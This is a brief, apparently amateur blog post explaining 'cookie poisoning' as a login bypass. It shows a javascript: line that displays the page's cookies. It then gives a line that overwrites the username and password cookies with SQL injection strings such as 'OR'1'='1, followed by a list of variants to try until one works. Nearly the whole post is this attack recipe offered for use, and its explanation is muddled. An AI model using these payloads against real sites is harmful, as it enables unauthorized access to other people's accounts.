Cookie Poisoning:
Well, for a starters i can begin with saying that Cookie Poisoning is alot like SQL Injection
Both have 'OR'1'='1 or maybe '1'='1'
But in cookie poisoning you begin with alerting your cookies
Javascript:alert(document.cookie)
Then you will perharps see "username=JohnDoe" and "password=iloveJaneDoe"
in this case the cookie poisoning could be:
Javascript:void(document.cookie="username='OR'1'='1"); void(document.cookie="password='OR'1'='1");
It is also many versions of this kind... like for example
'
'1'='1'
'OR'1'='1
'OR'1'='1'OR'
and so on...
You may have to try 13 things before you get it completely right...
0 comments:
Post a Comment